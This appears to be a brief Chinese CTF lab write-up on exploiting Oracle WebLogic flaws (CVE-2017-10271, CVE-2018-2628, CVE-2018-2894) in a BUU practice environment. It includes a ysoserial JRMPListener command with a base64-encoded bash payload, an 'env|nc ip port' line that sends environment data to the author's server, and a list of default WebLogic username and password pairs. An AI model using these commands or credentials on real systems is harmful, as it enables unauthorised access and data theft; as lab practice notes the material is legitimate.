type
status
date
slug
summary
tags
category
icon
password

[Weblogic]CVE-2017-10271
点开工具,直接选择漏洞,点击检查即可。在命令执行模块进行利用
[Weblogic]CVE-2018-2628
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 38080 CommonsCollections1 'bash -c {echo,命令的url编码}|{base64,-d}|{bash,-i}'我这里使用的是env|nc ip port这个命令,直接传env的值获取flag。测试环境无法反弹shell
通过这个命令在云服务器开启JRMP服务,再开启nc接收数据


在工具填入地址开跑就可以接收flag成功


[Weblogic]CVE-2018-2894
检测:在/console处检测

利用:
此漏洞无法使用工具自动化利用。
登录帐号为weblogic,密码在buu环境的启动处。
[Weblogic]Weak Password
system/password
weblogic/weblogic
admin/security
joe/password
mary/password
system/security
wlcsystem/wlcsystem
wlpisystem/wlpisystem